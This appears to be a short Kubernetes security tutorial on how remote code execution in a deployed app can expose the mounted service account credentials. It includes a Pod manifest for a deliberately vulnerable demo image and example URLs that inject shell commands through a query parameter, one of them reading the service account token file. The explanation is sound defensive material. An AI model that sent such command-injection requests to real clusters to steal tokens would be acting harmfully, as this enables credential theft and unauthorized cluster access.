An application that is deployed in the cluster and is vulnerable to a remote code execution vulnerability, or a vulnerability that eventually allows code execution, enables attackers to run code in the cluster. If service account is mounted to the container (default behavior in Kubernetes), the attacker will be able to send requests to the API server using this service account credentials (see also “Access the K8s API server“).
We deploy a Pod which contains an application vulnerability that can be exploited to gain a remote code execution (RCE).
apiVersion: v1
kind: Pod
metadata:
name: vulnerable-pod
spec:
containers:
- image: disenchant/vulnerable-app-demo
name: vulnerable-app
ports:
- containerPort: 80
(To keep this example minimal we assume the container port was made reachable outside of the cluster e.g. by using an Ingress.)
By accessing a URL like http://www.example.com/?shell=whoami (domain pointing to our Pod) we can exploit the simple vulnerability and execute the shell command whoami
. With something like http://www.example.com/?shell=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token we can access the service account which is mounted into the container as it executes the shell command cat /var/run/secrets/kubernetes.io/serviceaccount/token
inside of the container.